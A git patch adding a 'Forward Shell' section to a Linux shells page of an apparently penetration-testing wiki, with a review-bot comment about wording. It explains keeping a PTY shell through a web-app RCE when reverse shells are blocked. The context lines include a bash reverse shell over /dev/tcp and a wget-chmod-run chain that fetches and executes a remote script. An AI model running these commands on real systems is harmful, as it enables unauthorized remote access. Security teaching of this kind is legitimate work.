From 9008bae6b35ffd592f0cf1c269922992da444d7a Mon Sep 17 00:00:00 2001 From: CPol Date: Wed, 9 Feb 2022 20:23:12 +0000 Subject: [PATCH] GitBook: [#3002] No subject --- shells/shells/linux.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/shells/shells/linux.md b/shells/shells/linux.md index 2a0ffb0bc..1e1e89dbf 100644 --- a/shells/shells/linux.md +++ b/shells/shells/linux.md @@ -40,6 +40,19 @@ echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1/ 0>&1' > /tmp/sh. wget http:///shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh ``` +## Forward Shell + +You might find cases where you have a **RCE in a web app in a, Linux machine** but due to Iptables rules or other kind of filtering **you cannot get a reverse shell**. This "shell" allows you to maintain a PTY shell through that RCE using pipes inside the victim system.\ +You can find the code in [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)**** + +You just need to modify: + +* The URL of the vulnerable host +* The prefix and suffix of your payload (if any) +* The way the payload is sent (headers? data? extra info?) + +Then, you can just **send commands** or even **use the `upgrade` command** to get a full PTY (note that pipes are read and written with an approximate 1.3s delay). + ## Netcat ```bash
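Review bot: The first added paragraph under "## Forward Shell" has wording and markup defects that will show in the rendered page. "a **RCE in a web app in a, Linux machine**" carries a stray comma and reads better as "an **RCE in a web app on a Linux machine**". The link line ends in an empty bold run (`****`) that should be dropped. The line before it ends in a hard-break backslash, which renders inconsistently outside GitBook, so a blank line is safer. In the last added line, "an approximate 1.3s delay" would be clearer as "a delay of approximately 1.3 s". The subject "GitBook: [#3002] No subject" also says nothing about the change. A subject that names the new section in shells/shells/linux.md would keep the history searchable.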